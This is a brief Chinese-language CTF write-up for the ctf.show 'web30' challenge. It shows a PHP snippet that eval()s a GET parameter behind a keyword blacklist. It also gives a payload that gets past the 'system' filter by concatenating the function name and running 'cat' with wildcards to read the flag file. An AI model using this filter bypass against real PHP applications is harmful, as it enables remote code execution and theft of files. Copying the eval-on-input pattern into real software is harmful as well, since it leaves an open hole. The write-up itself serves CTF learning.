web30

代码审计

<?php



/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-09-04 00:12:34

# @Last Modified by:   h1xa

# @Last Modified time: 2020-09-04 00:42:26

# @email: h1xa@ctfer.com

# @link: https://ctfer.com



*/



error_reporting(0);

if(isset($_GET['c'])){

    $c = $_GET['c'];

    if(!preg_match("/flag|system|php/i", $c)){

        eval($c);

    }

    

}else{

    highlight_file(__FILE__);

}

过滤 system，还是很简单

用php的动态函数就行了

payload：

http://48c7fde3-1b06-422b-915d-25a32125fb8c.challenge.ctf.show/?c=$s="syste"."m";$s("cat fla?.ph?");